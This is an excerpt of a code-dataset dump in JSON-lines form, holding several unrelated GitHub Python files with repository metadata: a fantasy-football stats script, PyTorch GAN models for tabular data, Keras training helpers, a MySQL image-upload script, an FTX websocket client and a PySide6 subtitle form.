get_users():\n raw_users = league.get_users()\n raw_rosters = league.get_rosters()\n\n users = {}\n for user in raw_users:\n users[user[\"user_id\"]] = {\n \"user_id\": user[\"user_id\"],\n \"display_name\": user['display_name']\n }\n if user['metadata'].get('team_name'):\n users[user[\"user_id\"]][\"team_name\"] = user['metadata']['team_name']\n else:\n users[user[\"user_id\"]][\"team_name\"] = \"Team\" + user['display_name']\n for roster in raw_rosters:\n users[roster['owner_id']]['current_starters'] = roster['starters']\n users[roster['owner_id']]['current_roster'] = roster['players']\n users[roster['owner_id']]['current_reserves'] = roster['reserve']\n users[roster['owner_id']]['roster_id'] = roster['roster_id']\n users[roster['owner_id']]['standings'] = {\n 'wins': roster['settings']['wins'],\n 'losses': roster['settings']['losses'],\n 'ties': roster['settings']['ties'],\n 'fpts': float(str(roster['settings']['fpts']) + '.' + str(roster['settings']['fpts_decimal'])),\n 'ppts': float(str(roster['settings']['ppts']) + '.' + str(roster['settings']['ppts_decimal'])),\n 'fpts_against': float(str(roster['settings']['fpts_against']) + '.' + str(roster['settings']['fpts_against_decimal'])),\n 'waiver_budget_used': roster['settings']['waiver_budget_used']\n }\n w1m = league.get_matchups(1)\n print(users)\n\n\ndef get_players():\n players_path = 'resources/players.json'\n if os.path.exists(players_path):\n with open(players_path) as players_file:\n try:\n if not resource_needs_update(players_path):\n return json.load(players_file)\n else:\n return update_players(players_path)\n except:\n print(\"Error handling players.json file\")\n else:\n print(\"No players json found. Gathering new one.\")\n return update_players(players_path)\n\n\n\ndef get_stats_and_projections():\n all_weeks = range(1, int(config['seasonWeek']) + 1)\n all_weeks_stats = []\n all_weeks_projections = []\n for week in all_weeks:\n week = str(week)\n stats_path = 'resources/stats/' + week + '.json'\n projections_path = 'resources/projections/' + week + '.json'\n if os.path.exists(stats_path):\n with open(stats_path) as week_stats:\n try:\n all_weeks_stats.append(json.load(week_stats))\n except:\n print(\"Error handling \" + stats_path + \" file.\")\n week_stats.close()\n else:\n print(\"No stats json found for week \" + week + \".\")\n all_weeks_stats.append(update_stats(stats_path, week))\n\n if os.path.exists(projections_path):\n with open(projections_path) as week_projections:\n try:\n all_weeks_projections.append(json.load(week_projections))\n except:\n print(\"Error handling \" + projections_path + \" file.\")\n week_projections.close()\n else:\n print(\"No projections json found for week \" + str(week) + \".\")\n all_weeks_projections.append(update_projections(projections_path, week))\n return all_weeks_stats, all_weeks_projections\n\n\ndef get_stats_projections_and_diff_for_player(player_id, scoring_settings):\n stats = Stats()\n player_pts_by_week = {}\n\n for week in all_weeks_stats:\n player_week_stats = stats.get_player_week_stats(week, player_id)\n player_pts_by_week[week[0]['week']] = {\n \"stats\": {},\n \"projections\": {}\n }\n if player_week_stats is not None:\n pts = utils.calculate_points(scoring_settings, player_week_stats['stats'])\n player_pts_by_week[week[0]['week']]['stats'] = round(pts, 2)\n else:\n player_pts_by_week[week[0]['week']]['stats'] = 'BYE'\n\n for week in all_weeks_projections:\n player_week_projections = stats.get_player_week_projections(week, player_id)\n if player_week_projections is not 
None:\n pts = utils.calculate_points(scoring_settings, player_week_projections['stats'])\n player_pts_by_week[week[0]['week']]['projections'] = round(pts, 2)\n else:\n player_pts_by_week[week[0]['week']]['projections'] = 'BYE'\n\n for week, stats in player_pts_by_week.items():\n if stats['stats'] != 'BYE':\n player_pts_by_week[week][\"difference\"] = round(\n float(player_pts_by_week[week]['stats']) - float(player_pts_by_week[week]['projections']), 2)\n\n return player_pts_by_week\n\n\n\"\"\"\nMAIN CODE HERE\n\"\"\"\n\nwith open('config.json') as config_file:\n config = json.load(config_file)\n\nleague = League(config['leagueId'])\nscoring_settings = league.get_scoring_settings()\nusers = league.get_users()\nrosters = league.get_rosters()\n\nget_users()\nall_weeks_stats, all_weeks_projections = get_stats_and_projections()\nplayers = get_players()\n\n\ns_p = get_stats_projections_and_diff_for_player(utils.search_for_player_by_name(players, 'D.J. Chark')['player_id'], scoring_settings)\n\nutils.pprint(s_p)\n# utils.pprint(player_pts_by_week)\n#utils.pprint(players['96'])\n","repo_name":"sdcalmes/MySleeperStats","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"325852569","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport numpy as np\nimport pandas as pd\nimport os\nfrom torch.autograd import Variable\n\ndef mask_operate(data, mask, col_ind):\n\tresult = []\n\tfor i in range(mask.shape[1]):\n\t\tsta = col_ind[i][0]\n\t\tend = col_ind[i][1]\n\t\t#data[:, sta:end] = data[:, sta:end]*mask[:, i:i+1]\n\t\tresult.append(data[:, sta:end]*mask[:, i:i+1])\n\tresult = torch.cat(result, dim = 1)\n\treturn result\n\nclass MaskGenerator_MLP(nn.Module):\n\tdef __init__(self, z_dim, data_dim, hidden_dims, mask_dim):\n\t\tsuper(MaskGenerator_MLP, self).__init__()\n\t\tdim = z_dim+data_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tfc = nn.Linear(dim, item)\n\t\t\tnn.init.xavier_normal_(fc.weight)\n\t\t\tseq += [\n\t\t\t\tfc,\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.LeakyReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [nn.Linear(dim, mask_dim)]\n\t\tnn.init.xavier_normal_(seq[-1].weight)\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, z, x):\n\t\tz = torch.cat((z,x),dim=1)\n\t\tm = self.net(z)\n\t\tm = torch.sigmoid(m)\n\t\treturn m\n\n\nclass ObservedGenerator_MLP(nn.Module):\n\tdef __init__(self, z_dim, hidden_dims, x_dim, mask_dim, col_type, col_ind):\n\t\tsuper(ObservedGenerator_MLP, self).__init__()\n\t\tself.col_type = col_type\n\t\tself.col_ind = col_ind\n\t\tdim = z_dim + x_dim + mask_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tfc = nn.Linear(dim, item)\n\t\t\tnn.init.xavier_normal_(fc.weight)\n\t\t\tseq += [\n\t\t\t\tfc,\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.ReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [nn.Linear(dim, x_dim)]\n\t\tnn.init.xavier_normal_(seq[-1].weight)\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, z, x, m):\n\t\tinput = torch.cat((z, x, m), dim = 1)\n\t\tdata = self.net(input)\n\t\toutput = []\n\t\tfor i in range(len(self.col_type)):\n\t\t\tsta = self.col_ind[i][0]\n\t\t\tend = self.col_ind[i][1]\n\t\t\tif self.col_type[i] == 'condition':\n\t\t\t\tcontinue\n\t\t\tif self.col_type[i] == 'normalize':\n\t\t\t\ttemp = 
torch.tanh(data[:,sta:end])\n\t\t\telif self.col_type[i] == 'one-hot':\n\t\t\t\ttemp = torch.softmax(data[:,sta:end], dim=1)\n\t\t\telif self.col_type[i] == 'gmm':\n\t\t\t\ttemp1 = torch.tanh(data[:,sta:sta+1])\n\t\t\t\ttemp2 = torch.softmax(data[:,sta+1:end], dim=1)\n\t\t\t\ttemp = torch.cat((temp1,temp2),dim=1)\n\t\t\telif self.col_type[i] == 'ordinal':\n\t\t\t\ttemp = torch.sigmoid(data[:,sta:end])\n\t\t\toutput.append(temp)\n\t\toutput = torch.cat(output, dim = 1)\n\t\treturn output\n\nclass ObservedGenerator_LSTM(nn.Module):\n\tdef __init__(self, z_dim, feature_dim, lstm_dim, col_dim, col_type, col_ind, x_dim, mask_dim):\n\t\tsuper(ObservedGenerator_LSTM, self).__init__()\n\t\tself.x_dim = x_dim\n\t\tself.mask_dim = mask_dim\n\t\tself.l_dim = lstm_dim\n\t\tself.f_dim = feature_dim\n\t\tself.col_dim = col_dim\n\t\tself.col_ind = col_ind\n\t\tself.col_type = col_type\n\t\tself.GPU = False\n\t\tself.LSTM = nn.LSTMCell(z_dim+x_dim+mask_dim+feature_dim, lstm_dim) # input (fx, z, attention), output(hx, cx)\n\t\tself.FC = {}\t # FullyConnect layers for every columns \n\t\tself.Feature = {}\n\t\tself.go = nn.Parameter(torch.randn(1, self.f_dim))\n\t\tfor i in range(len(col_type)):\n\t\t\tif col_type[i] == \"condition\":\n\t\t\t\tcontinue\n\t\t\tif col_type[i] == \"gmm\":\n\t\t\t\tself.FC[i] = []\n\t\t\t\tfc1 = nn.Linear(feature_dim, 1)\n\t\t\t\tsetattr(self, \"gmfc%d0\"%i, fc1)\n\t\t\t\t\n\t\t\t\tfc2 = nn.Linear(feature_dim, col_dim[i] - 1)\n\t\t\t\tsetattr(self, \"gmfc%d1\"%i, fc2)\n\t\t\t\t\n\t\t\t\tfc3 = nn.Linear(col_dim[i] - 1, feature_dim)\n\t\t\t\tsetattr(self, \"gmfc%d2\"%i, fc3)\n\t\t\t\tself.FC[i] = [fc1, fc2, fc3]\n\t\t\t\t\n\t\t\t\tfe1 = nn.Linear(lstm_dim, feature_dim)\n\t\t\t\tsetattr(self, \"gmfe%d0\"%i, fe1)\n\t\t\t\t\n\t\t\t\tfe2 = nn.Linear(lstm_dim, feature_dim)\n\t\t\t\tsetattr(self, \"gmfe%d1\"%i, fe2)\n\t\t\t\tself.Feature[i] = [fe1, fe2]\n\t\t\telse:\n\t\t\t\tfc1 = nn.Linear(feature_dim, col_dim[i])\n\t\t\t\tsetattr(self, \"fc%d0\"%i, fc1)\n\t\t\t\t\n\t\t\t\tfc2 = nn.Linear(col_dim[i], feature_dim)\n\t\t\t\tsetattr(self, \"fc%d1\"%i, fc2)\n\t\t\t\tself.FC[i] = [fc1, fc2]\n\t\t\t\t\n\t\t\t\tfe = nn.Linear(lstm_dim, feature_dim)\n\t\t\t\tsetattr(self, \"fe%d\"%i, fe)\n\t\t\t\tself.Feature[i] = fe\n\n\tdef forward(self, z, x, m):\n\t\tstates = []\n\t\toutputs = []\n\t\tz = torch.cat((z, x, m),dim=1)\n\t\thx = torch.randn(z.size(0), self.l_dim)\n\t\tcx = torch.randn(z.size(0), self.l_dim)\n\t\tfx = self.go.repeat([z.size(0), 1])\n\t\tif self.GPU:\n\t\t\thx = hx.cuda()\n\t\t\tcx = cx.cuda()\n\t\t\tfx = fx.cuda()\n\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\tfor i in range(len(self.col_type)):\n\t\t\tif self.col_type[i] == \"condition\":\n\t\t\t\tcontinue\n\t\t\tif self.col_type[i] == \"gmm\":\n\t\t\t\thx, cx = self.LSTM(inputs, (hx, cx))\n\t\t\t\tstates.append(hx)\n\t\t\t\tfx = torch.tanh(self.Feature[i][0](hx))\n\t\t\t\tv = torch.tanh(self.FC[i][0](fx))\n\t\t\t\toutputs.append(v)\n\t\t\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\t\t\t\n\t\t\t\thx, cx = self.LSTM(inputs, (hx, cx))\n\t\t\t\tstates.append(hx)\n\t\t\t\tfx = torch.tanh(self.Feature[i][1](hx))\n\t\t\t\tv = self.FC[i][1](fx)\n\t\t\t\tv = torch.softmax(v, dim=1)\n\t\t\t\toutputs.append(v)\n\t\t\t\tfx = torch.tanh(self.FC[i][2](v))\n\t\t\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\t\telse:\n\t\t\t\thx, cx = self.LSTM(inputs, (hx, cx))\n\t\t\t\tstates.append(hx)\n\t\t\t\tfx = self.Feature[i](hx)\n\t\t\t\tv = self.FC[i][0](fx)\n\t\t\t\tif self.col_type[i] == \"normalize\":\n\t\t\t\t\tv = torch.tanh(v)\n\t\t\t\telif 
self.col_type[i] == \"one-hot\":\n\t\t\t\t\tv = torch.softmax(v, dim = 1)\n\t\t\t\telif self.col_type[i] == \"ordinal\":\n\t\t\t\t\tv = torch.sigmoid(v)\n\t\t\t\toutputs.append(v)\n\t\t\t\tfx = self.FC[i][1](v)\n\t\t\t\tinputs = torch.cat((z, fx), dim = 1)\n\t\ttrue_output = torch.cat(outputs, dim = 1)\n\t\treturn true_output\n\nclass Discriminator(nn.Module):\n\tdef __init__(self, x_dim, hidden_dims, c_dim=0, condition=False):\n\t\tsuper(Discriminator, self).__init__()\n\t\tself.condition = condition\n\t\tdim = x_dim+c_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tfc = nn.Linear(dim, item)\n\t\t\tnn.init.xavier_normal_(fc.weight)\n\t\t\tseq += [\n\t\t\t\tfc,\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.LeakyReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [nn.Linear(dim, 1)]\n\t\tnn.init.xavier_normal_(seq[-1].weight)\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, x, c=None):\n\t\tif self.condition:\n\t\t\tx = torch.cat((x, c), dim=1)\n\t\ty = self.net(x)\n\t\treturn y\n\n\tdef init_weights(self):\n\t\tpass\n\nclass Noise_Discriminator(nn.Module):\n\tdef __init__(self, x_dim, hidden_dims, mask_dim):\n\t\tsuper(Noise_Discriminator, self).__init__()\n\t\tdim = x_dim\n\t\tseq = []\n\t\tfor item in list(hidden_dims):\n\t\t\tseq += [\n\t\t\t\tnn.Linear(dim, item),\n\t\t\t\tnn.BatchNorm1d(item),\n\t\t\t\tnn.Dropout(0.5),\n\t\t\t\tnn.LeakyReLU()\n\t\t\t]\n\t\t\tdim = item\n\t\tseq += [\n\t\t\tnn.Linear(dim, mask_dim),\n\t\t\tnn.Sigmoid()\n\t\t]\n\t\tself.net = nn.Sequential(*seq)\n\n\tdef forward(self, x):\n\t\ty = self.net(x)\n\t\treturn y\n","repo_name":"ruc-datalab/dagan","sub_path":"code/synthesizer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"28760295819","text":"# list1=[10,20,40,60,70,80] sorted list\r\n# list2=[5,15,25,35,45,60] sorted list\r\n# Merge these two sorted lists to produce one sorted list, but use only loop either while or for only one time\r\nlist1=[10,20,40,60,70,80] \r\nlist2=[5,15,25,35,45,60]\r\nlist1.sort()\r\nlist2.sort()\r\n# print(list1,\" \",list2)\r\nres=sorted(list1+list2)\r\nprint(res)","repo_name":"saisahanar/python-letsupgrade-","sub_path":"DAY 5 ASSIGNMENT/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15251325644","text":"# Script contain base function\n#\n# Author: Robert Kolcun, FIT\n# <xkolcu00@stud.fit.vutbr.cz>\n\nfrom printer import print_error\n\nimport keras.backend as K\nimport argparse\n\n\ndef parse_arguments_training():\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"--dataset\",\n required=True,\n help=\"path to input data for training\",\n )\n ap.add_argument(\n \"--model\",\n required=True,\n help=\"path where model will be saved\",\n )\n ap.add_argument(\n \"--alg\",\n required=True,\n help=\"type of algorithm for image classification\",\n )\n ap.add_argument(\n \"--ep\",\n required=False,\n help=\"number of epochs\"\n )\n ap.add_argument(\n \"--bs\",\n required=False,\n help=\"batch size\"\n )\n ap.add_argument(\n \"--rt\",\n required=False,\n help=\"rotation type\"\n )\n return vars(ap.parse_args())\n\ndef parse_arguments_prediction():\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"--class\",\n \"--c\",\n required=True,\n help=\"path to model for weapon classification\"\n )\n ap.add_argument(\n \"--anglep\",\n 
\"--p\",\n required=True,\n help=\"path to model prediction Pitch axis of weapon angle\"\n )\n ap.add_argument(\n \"--angler\",\n \"--r\",\n required=True,\n help=\"path to model prediction Roll axis of weapon angle\"\n )\n ap.add_argument(\n \"--angley\",\n \"--y\",\n required=True,\n help=\"path to model prediction Yaw axis of weapon angle\"\n )\n ap.add_argument(\n \"--image\",\n \"--i\",\n required=True,\n help=\"path to image for prediction\"\n )\n return vars(ap.parse_args())\n\ndef parse_arguments_evaluation():\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"--model\",\n required=True,\n help=\"path to folder of trained model\"\n )\n ap.add_argument(\n \"--image\",\n required=False,\n help=\"path to input image\"\n )\n ap.add_argument(\n \"--dataset\",\n required=False,\n help=\"path to input images\"\n )\n ap.add_argument(\n \"--file\",\n required=False,\n help=\"path to file with paths to images\"\n )\n ap.add_argument(\n \"--th\",\n required=False,\n help=\"threshold for angle prediction\"\n )\n return vars(ap.parse_args())\n\ndef angle_error(true_y, pred_y):\n diff = calculate_diff_angle(K.argmax(true_y), K.argmax(pred_y))\n return K.mean(K.cast(K.abs(diff), K.floatx()))\n\ndef calculate_diff_angle(correct_angle, predicted_angle):\n # Calculate diff. angle\n return 180 - abs(abs(correct_angle - predicted_angle) - 180)\n\ndef get_prediction(model_class, image):\n if (len(image.shape) == 3):\n image = image.reshape(image.shape + (1,))\n\n switched_labels = dict((y,x) for x,y in model_class.labels_dict.items())\n result_dict = {}\n for i, value in enumerate(model_class.model.predict(image)[0]):\n result_dict.update({\n switched_labels[i]: round(float(value), 6)\n })\n return result_dict\n\nclass Algorithm():\n\n CNN = 'Convolutial Neural Network'\n CNN_C = CNN + ' class'\n CNN_A = CNN + ' angle'\n MLP = 'Multi Layer Perceptron'\n SVM = 'Super Vector Machine'\n KMEANS = 'K-means Classification'\n\n translate_dict = {\n 'cnnc': CNN_C,\n 'cnna': CNN_A,\n 'mlp': MLP,\n 'svm': SVM,\n 'kmeans': KMEANS,\n }\n\n @classmethod\n def translate(self, in_type):\n try:\n return self.translate_dict[in_type]\n except KeyError:\n print_error('Invalid algorithm type')\n","repo_name":"NoName115/Bachelor-thesis","sub_path":"src/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8505738937","text":"from mysql import connector\nimport base64\nimport glob\nimport random\n\n\n\nBASE_DIR = \"/home/akash/Downloads/Major_Project/structured_images/tops/\"\nimg_paths = glob.glob(BASE_DIR + \"*.jpeg\")\n\nconnection = connector.connect(\n host='192.168.56.101', database='visualsearch', user='user', password='Akash123')\n\ntop_names = [\"ZARA's Exclusive Top\", \"H&M Fancy Wear\", \"Pantaloon's Summer Top\", \"Nykaa Fashion Wear\", \"Levi's Top\"]\ncnt = 0\nfor img_path in img_paths:\n cnt = cnt%5\n image64 = \"\"\n with open(img_path, \"rb\") as img_file:\n image64 = base64.b64encode(img_file.read())\n #print(image64)\n cursor = connection.cursor()\n sql_insert_blob_query = \"\"\" INSERT INTO tops\n (id, image, image_name, price) VALUES (%s,%s,%s,%s)\"\"\"\n\n img_name = top_names[cnt]\n id = img_path.split(\"/\")[-1].split(\".\")[0]\n price = random.randint(100, 10000)\n print(id, img_name)\n insert_blob_tuple = (id, image64, img_name, price)\n result = cursor.execute(sql_insert_blob_query, insert_blob_tuple)\n connection.commit()\n cnt=cnt+1\n\nif 
connection.is_connected():\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed\")\n","repo_name":"akash11061999/Visual-Search-Recommendation","sub_path":"image-similarity/image-save-mysql.py","file_name":"image-save-mysql.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34825454828","text":"# from gevent import socket\n# import greenlet\n# from threading import activeCount as activeCountThreads\n# def _ordbk_task(self, market: str, delay):\n# \"\"\" Upon update, object FIFO-Queued for safe writes. \"\"\"\n# logging.debug(f'<<< _ORDER_BOOK_TASK({market}, delay=wait()).started(protected) >>>')\n# while self._run_event.is_set():\n# (mkt_ordbk, ordbk_ts) = self.get_orderbook(market=market), self.get_ordbk_ts(market=market)\n# self._write_pool.put([market, mkt_ordbk, ordbk_ts, 'ORDERBOOK'])\n# print(f'-> Orderbook({market}).recv[ <{ordbk_ts}> ]')\n# # time.sleep(2.0)\n# self.wait_for_orderbook_update(market=market, timeout=5.0)\n#\n#\n# def _tick_task(self, market: str, delay: float = 4):\n# logging.debug(f'>>> _TICKERS_TASK(market={market}, delay={delay})')\n# while self._run_event.is_set():\n# (mkt_ticks, tick_ts) = self.get_tickers(market=market), self.get_ticker_ts(market=market)\n# if len(mkt_ticks) > 0:\n# self._write_pool.put([market, mkt_ticks, tick_ts, 'TICKERS'])\n# logging.debug(f'>>> Tickers({market}).recv[<{tick_ts}>]')\n# time.sleep(2)\n#\n#\n# def _trade_task(self, market: str, delay: float = 2):\n# logging.debug(f'>>> _TRADES_TASK(market={market}, delay={delay})')\n# while self._run_event.is_set():\n# (mkt_trades, local_ts) = self.get_trades(market=market), self.get_local_ts()\n# if len(mkt_trades) > 0:\n# self._write_pool.put([market, mkt_trades, local_ts, 'TRADES'])\n# logging.debug(f'>>> Tickers({market}).recv[<{local_ts}>]')\n# time.sleep(2)\nimport json\nfrom threading import enumerate as enumerate_threads\nfrom queue import Queue\nfrom _queue import Empty\nfrom FTX_Ws_Broker import *\n\n\nclass ClientSocket(FtxWebsocketClient):\n \"\"\"\n Create class instance and pass tuple with market names to .heavy_wizard()\n Socket is opened with exchange server, subscription requests sent\n Efficient wait loop for orderbook updates implemented with gevent.Event\n \"\"\"\n def __init__(self):\n \"\"\" All attributes _protected to protect proper synchronization pattern \"\"\"\n super().__init__()\n self._subs_pool = Queue()\n self._write_pool = Queue()\n self._run_event = Event()\n self._thread_pooler = None\n self._set_tasks()\n\n @staticmethod\n def get_local_ts():\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')\n\n def _run_task(self, market: str, channel_handle: str, ftx_task, ftx_ts):\n if channel_handle is 'orderbooks':\n while self._run_event.is_set():\n (channel, timestamp) = ftx_task(market=market), ftx_ts(market=market)\n self._write_pool.put([market, channel, timestamp, channel_handle.upper()])\n self.wait_for_orderbook_update(market=market, timeout=5.0)\n else:\n while self._run_event.is_set():\n (channel, timestamp) = ftx_task(market=market), ftx_ts(market=market)\n self._write_pool.put([market, channel, timestamp, channel_handle.upper()])\n time.sleep(2.0)\n\n def _stream_pooler(self, market: str = None, interval: str = None, channel=(True, False, False)):\n \"\"\" Creates thread tasked with polling XYZ market, FIFO.put for processing \"\"\"\n pools = {\n 'Orderbooks': (self.get_orderbook, self.get_ordbk_ts),\n 'Trades': 
(self.get_trades, self.get_local_ts),\n 'Tickers': (self.get_tickers, self.get_ticker_ts)\n }\n for channel, streams in pools.items():\n mkt_threader = Thread(\n name=f'{market}{channel}', target=self._run_task,\n args=(market, channel, streams[0], streams[1]))\n mkt_threader.start()\n\n def _subscription_arbiter(self) -> None:\n \"\"\" Gets new subscriptions from _subs_pool queue and starts _sub_market_thread \"\"\"\n while self._run_event.is_set():\n market_name, market_thread = self._subs_pool.get()\n market_thread.start()\n time.sleep(0.5)\n self._subs_pool.task_done()\n self._subs_pool.join()\n\n def _stream_wizard(self, streamers):\n if not self._run_event.is_set():\n self._run_event.set()\n if self._thread_pooler is None:\n self._thread_pooler = Thread(name='_ARBITER', target=self._subscription_arbiter, daemon=True)\n self._thread_pooler.start()\n market_pool = Thread(name='_MARKET_POOL', target=self._stream_pooler, args=(streamers,))\n safe_writes = Thread(name='_WRITE_WIZARD', target=self._write_worker)\n return market_pool, safe_writes\n\n def _write_worker(self):\n raise NotImplementedError()\n\n\nclass WriteUpdates(ClientSocket):\n def __init__(self):\n super().__init__()\n\n def _write_worker(self) -> Any:\n \"\"\"\n TODO raise NotImplementedError() -> inherit attributes to database_handler\n Processes queued items for safe-writes to file.txt\n \"\"\"\n try:\n while True:\n (market, update, update_ts, channel) = self._write_pool.get(timeout=5)\n valid_name = ''.join(['_' if x in '/' else x for x in market]).upper()\n with open(file=f'../temp_storage/{valid_name}_{channel}.txt', mode='a+') as filer:\n filer.writelines(f\"{json.dumps({f'UPDATED[{update_ts}]': update})}\\n\")\n self._write_pool.task_done()\n except Empty:\n logging.debug(f'* SafeWriteQueue.isEmpty(joinQueue=True) *')\n except OSError as ose:\n raise ose\n finally:\n self._write_pool.join()\n\n def stream_wizard(self, streamers: Dict[str, Any]) -> None:\n market_pool, safe_writes = self._stream_wizard(streamers=streamers)\n market_pool.start()\n time.sleep(0.5)\n safe_writes.start()\n try:\n while 1:\n time.sleep(5)\n except KeyboardInterrupt:\n print()\n logging.debug(f'\\n>>> KeyboardInterrupt:[ _TERMINATE_THREAD_POOL ]')\n self._run_event.clear()\n market_pool.join()\n safe_writes.join()\n self.disconnect()\n finally:\n for ti in enumerate_threads():\n print(f'>>> LiveThread: [{ti}]')\n return\n\n\nif __name__ == '__main__':\n print(f'>>> Running FTX_OrderbooksClient as {__name__}\\n')\n socks = WriteUpdates()\n # lol = ('BTC/USD', 'BTC/USDT', 'BTC-PERP', 'BTC/TRYB', 'ETH/USD', 'ETH/USDT', 'ETH/BTC', 'ETH-PERP')\n # 'trades': (12, lol), 'tickers': (10, lol)})\n # socks.stream_wizard({'trades': lol})\n\n lol = ('BTC-PERP',)\n socks.stream_wizard({'orderbook': lol})\n\nelse:\n print(f'>>> Running FTX_OrderbooksClient as {__name__}\\n')\n\n#\n#\n#\n#\n#\n#\n# # #\n # def _orderbook_wizard(self, many_markets: Tuple[str, ...]) -> None:\n # \"\"\"\n # Protected method: Breaks many markets into single markets\n # Iterates over many_market_names(or_one) threading each\n # \"\"\"\n # logging.debug('<<< _POLL_WIZARD.started(protected) >>>')\n # # self._thread_pool_starter()\n # for single_market in many_markets:\n # # self._market_pool(single_market.upper())\n # pass\n #\n # def _market_pool(self, market: str):\n # \"\"\"\n # Protected method: Manages polling queue\n # Creates thread tasked with polling XYZ market, FIFO.put for processing\n # \"\"\"\n # logging.debug(f'>>> _START_POOL.QUEUE_GET: [ {market} ]')\n # 
threader = Thread(name=f'POLL_{market}', target=self._polling_manager, args=(market,))\n # threader.setDaemon(True)\n # self._unsub_pool.put_nowait(threader)\n # self._subs_pool.put([market, threader])\n #\n # def _orderbook_wizard(self, many_markets: Tuple[str, ...]) -> None:\n # \"\"\"\n # Protected method: Breaks many markets into single markets\n # Iterates over many_market_names(or_one) threading each\n # \"\"\"\n # logging.debug('<<< _POLL_WIZARD.started(protected) >>>')\n # self._thread_pool_starter()\n # for single_market in many_markets:\n # self._market_pool(single_market.upper())\n #\n # def _serial_killer(self):\n # \"\"\"\n # Protected method: Thread joiner\n # ATTEMPTS graceful exit. Called on raise ExitTypeInterrupt. . .\n # \"\"\"\n # try:\n # while True:\n # kill_thread = self._unsub_pool.get_nowait()\n # logging.debug(f'>>> Attempting kill_thread.join(): {kill_thread}')\n # kill_thread.join(timeout=3.0)\n # time.sleep(0.5)\n # except Exception as e:\n # logging.debug(f'>>> raised EmptyException?: {e}')\n # finally:\n # return\n\n\n# class StartClientServer:\n# # _HOST_ID = socket.gethostbyname(socket.gethostname())\n# _HOST_ID = 'localhost'\n# _PORT_NUM = 55555\n#\n# def __init__(self, client_server=None):\n# super().__init__()\n# self.client_server = client_server\n# self.client_queue = queue.Queue()\n# self.new_client = None\n#\n# def _run_client_server(self):\n# raise NotImplementedError()\n#\n# def _start_client_server(self):\n# assert not self.client_server, 'must not already be an idiot'\n# self.client_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# self.client_server.bind((self._HOST_ID, self._PORT_NUM))\n# self.client_server.listen(1)\n#\n# def start_client_server(self):\n# if self.client_server is None:\n# self._start_client_server()\n# assert self.client_server, 'must be an idiot first'\n# self._run_client_server()\n#\n#\n# class RunClientServer(StartClientServer):\n# def __init__(self):\n# super().__init__()\n# # self.wait_cs_socket =\n#\n# def _run_client_server(self):\n# pass\n#\n# def run_client_server(self):\n# assert self.client_server, 'must be an idiot first'\n# while True:\n# self.client_queue.put(self.client_server.accept())\n","repo_name":"carv-cmd/cfTech","sub_path":"DerivativeMarkets/FTX_4/FTX_Websocket/FTX_Ws_Client.py","file_name":"FTX_Ws_Client.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32356685812","text":"from PySide6 import QtWidgets, QtGui, QtCore\n\n\nclass SubtitleUI(QtWidgets.QWidget):\n def __init__(self):\n super(SubtitleUI, self).__init__()\n\n self.form_layout = QtWidgets.QFormLayout()\n self.setLayout(self.form_layout)\n\n self.start_time = QtWidgets.QDoubleSpinBox()\n self.start_time.setMaximum(100000.0)\n self.form_layout.addRow(\"Start Time (sec)\", self.start_time)\n\n self.end_time = QtWidgets.QDoubleSpinBox()\n self.end_time.setMaximum(100000.0)\n self.form_layout.addRow(\"End Time (sec)\", self.end_time)\n\n self.sub_text = QtWidgets.QPlainTextEdit()\n self.form_layout.addRow(\"Text\", self.sub_text)\n","repo_name":"C3RV1/LaytonEditor","sub_path":"gui/ui/command_editor/commands/movie/Subtitle.py","file_name":"Subtitle.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"54399293","text":"from itertools import combinations, combinations_with_replacement\n\ndollar_bills = [20, 20, 20, 10, 10, 10, 10, 
